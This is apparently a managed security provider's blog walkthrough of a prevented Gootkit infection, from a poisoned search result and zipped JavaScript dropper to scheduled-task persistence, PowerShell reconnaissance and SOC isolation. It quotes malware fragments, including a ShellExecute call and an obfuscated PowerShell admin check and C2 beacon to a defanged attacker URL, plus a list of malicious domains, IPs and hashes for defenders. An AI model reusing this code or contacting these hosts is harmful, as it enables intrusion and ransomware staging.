Gootkit Malware Exploit

At Stripe OLT, our analysts face new challenges every day, and occasionally, we come across something noteworthy…

Recently, at Stripe OLT, our team encountered a Gootkit malware exploit in one of our client’s systems. Gootkit, while not as widely recognised as some other malware families, has developed from a simple trojan into a complex tool that delivers various malicious payloads, exploits vulnerabilities, and gains unauthorised access to data.

The below process will walk you through our experience with this specific Gootkit exploit, from the initial detection to how we ultimately isolated the risk. It’s a straightforward look at how we handled this situation, in the hope that those reading can gain insight into the risks associated with downloaded ransomware.

The following is a walk-through of a genuine GootKit prevention event. A reconnaissance, persistence and ransomware deployment mechanism.

Incident Prevention Walkthrough

Using specific terminology as bait, a threat actor created a link between themselves and an end-user by exploiting a common document template. Using a legitimate WordPress site, the threat actor deployed a poisoned search engine link for a term related to that document template.

Diagram of Exploit Process – Click to Enlarge

Incident Walkthrough

We’ll explore the incident in a condensed step-by-step format to highlight the behaviours exhibited by Gootkit.

Enter our End User

Casually browsing Bing without a care in the world.

Seeing a hit for their search ‘international deposit netting agreements’ they clicked the link.

The user navigates to the domain and downloads a zipped file. The file name checks out and matches their search term.

File Created

A file is created and added to the downloads folder.

Internationaldepositnettingagreement_0121.zip
C\Users\user@example.com\Downloads

Potential Prevention

With adequate threat intelligence, and the right automated preventative controls, any further interaction or threat could have been mitigated.

Threat intelligence feeds

IP reputation Blocks

Domain reputation blocks

Automated blocking of WordPress sites

.zip extension download alerting/blocks

User File Execution

Opening the .ZIP file, our user runs the JavaScript contained.

international deposit netting agreement 8965.js

Javascript Execution

Triggering the JavaScript results in the execution of sequential actions designed to create persistence, perform reconnaissance, and pave the way for ransomware deployment.

Registry Value Set and modified.

C:\Windows\System32\ WScript.exe.FriendlyAppName

wscript.exe modifies a Registry Value and creates a scheduled task called ‘location selection’. This scheduled task utilised the executable ITERAT~.JS.

IHost.Sleep(“11111”)

The script pauses execution on the host.

IHost.FullName()

The script tries to retrieve the full name or path of the host application/environment.

IHost.ScriptFullName

Similar to the previous command, pulls the full path name for the script file.

IHost.CreateObject(“shell.APPlicaTion”

Creates an instance of the shell application.

IShellDispatch6.ShellExecute(“cscript.exe”, “”ITERAT~1.JS””, “”C:\Users\User”, “oPEn”, “0”);

This line attempts to execute the shell command, trying to run the ITERAT~1.JS using ‘cscript.exe’.

Triggering Powershell scripts

Multiple unsigned and partially obfuscated PowerShell scripts trigger, performing system discovery and reconnaissance actions.

{$_.nAMe}

Extracts the ‘name’ object from the current pipeline. Used in conjunction with ‘get-process’ it would extract the name of each process.

{$_.mAinwindowTITLe}

The script block extracts the MainWindowTitle property of each process, which is the title of the main window associated with that process.

{$_.nAME+”^”+$_.MaInwIndowTITle}

Links the ‘name’ and ‘MainWindowTitle’ properties for each process found.

{$_.FrEE -gT 50000}

Reviewing whether the infected device has access to a certain size of hard drive space free.

SELECT * FROM Win32_LogicalDisk WHERE DeviceId=’H:’

looks for a H: drive category to select.

‘whoami’

Displays information regarding the current user, including group and privilege assignments

Once deployed, GootKit will perform situation awareness tasks to understand the environment. Looking for active processes, host information and disk space is essential reconnaissance before deploying ransomware into an environment.

More chances to prevent

With multiple PowerShell scripts running with standard user privileges, there are different preventative measures that could have been enforced to hinder the activity.

Prevent unsigned PowerShell scripts from running.

Prevent obfuscated scripts from running.

Prevent standard privilege user accounts from executing PowerShell scripts.

Audit and alert suspicious system discovery activities.

Threat intelligence feeds and blocks for file hashes and domains.

Suspicious Registry value change blocks/alerting.

Further System Discovery

The heavily obfuscated script performs further system discovery activities, including checking whether administrative privileges are present.

If the ‘$isLocalAdmin’ value is 1, it constructs a string ‘$u6’ with the value “ADA3EA8A0D”. Using GET and POST requests, the compromised endpoint used a HTTPS implant to communicate with their attacker-controlled command and control service.

New-Object
(Security.Principal.WindowsPrincipal)
([Security.Principal.WindowsIdentity]::
((GetCurrent))
())).IsInRole([Security.Principal.WindowsBuiltinRole]::(Administrator))) {
$isLocalAdmin = “1”
} else {
$isLocalAdmin = “0”
};

$splitString = ADA3EA8A0D;

$g8 = new-object ($w[30]);
function r3($a4) { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };
$c9 = ($w[46]);
$r1 = 30000;
$c8 = (hxxps[:]//ewaprzyjazna[.]pl/xmlrpc[.]php);
$u6 = “ADA3EA8A0D=$($isLocalAdmin)”;
if ($g8.(Count) -ne 0) {
$u6 = “$u6!” + ($g8 -join “|”)

End user Behaviour Trigger

Our user logs off for the day, shutting down their device.

The next morning arrives, and our user opens their laptop to begin a busy day of work.

Fulfilling a pre-requisite for a scheduled task, Powershell attempts to communicate with remote hosts on multiple channels.

SOC Intervention

Fortunately, at this point, the SOC had been called in to intervene.

Our team was able to assess the indicators and behaviour shown and respond appropriately.

We implemented device isolation, entity blocks, and remediation steps to prevent there being any further exploration or exploitation of the environment. No successful lateral movement, credential access or file exfiltration occurred.

Typically, following the deployment of Gootkit on an endpoint device, the goal is to move laterally through the environment until the actor reaches the goal of an appropriate server with admin rights available to then deploy ransomware. Fortunately, during this event, this did not occur. Not a Goot day for the threat actor.

OC data from this event is below.
DO NOT NAVIGATE TO THE LISTED ENTITES.
If you’re a security or IT practitioner, use these to harden your environment against this exploit!

BING Search URL
hxxps[://]www.bing[.]com[/]search?q=International+Deposit+Netting+Agreement&cvid=e3b01e2049004d85a49beeaadb8e535d&gs_lcrp=EgZjaHJvbWUyBggAEEUYOTIHCAEQRRj8VdIBBzc2N2owajmoAgCwAgA&PC=U531&FPIG=51FDC77EC18F4C9B9437A85F1B616802&first=21&FORM=PERE[1]

Initial Redirect Domain
thirstymag[.]com

Compromised Domain
thirstymag[.]com/blog[.]php
18[.]209[.]242[.]38

Downloaded .zip
International_deposit_netting_agreement_62671.zip
Hash
1acc0ccc9b45a61bf5e72de4b4d498f6ffbf6d5feb765564a8d51b5ec88b9bb6

Initial Java Script
international deposit netting agreement 37722.js
Hash
f19e3772bad5d660cedffec7a71ffb360ed7e4f7f375d365ca8023629ccb6d63

Scheduled Task Script
ITERAT~1.JS
Hash
b0f6225aee8447d64fd522f2e2cb625a07f91f38c89217796c621d2d1cbd5143
Path
C:\Users\user@domain.com\AppData\Roaming\’discovered resource’

URLs / Domains
hxxps[:]//ewaprzyjazna[.]pl/xmlrpc[.]php
IP: 109[.]237[.]140[.]52 (IpV4):443, alfa3207[.]alfahosting-server[.]de
(pflege-expert[.]de)
IP: 91[.]203[.]110[.]217 (IpV4):443, host217[.]checkdomain[.]de (videogamecast[.]de)
IP: 104[.]21[.]69[.]96 (IpV4):443, Cloudflare[.]com (freevpn[.]me)
IP: 172[.]67[.]206[.]248 (IpV4):443, Cloudflare[.]com
rainbownourishment[.]com)
IP: 185[.]251[.]11[.]73 (IpV4):80, gmessaging[.]net
IP: 103[.]1[.]208[.]220 (IpV4):443, hl-lw10[.]viettelidc[.]com[.]vn
nlx[.]com[.]vm)
IP: 2[.]57[.]138[.]160 (IpV4):443, s35[.]zenbox[.]pl (znadplanszy[.]pl)
IP: 172[.]67[.]130[.]23 (IpV4):443, Cloudflare[.]com (sawahegy[.]com) IP: 104[.]21[.]7[.]97 (IpV4):443, Cloudflare[.]com
(sawahegy[.]com)

If you want to find out how our award-winning SOC team can help to secure your business get in touch, or, for more information into our managed security operations centre click here.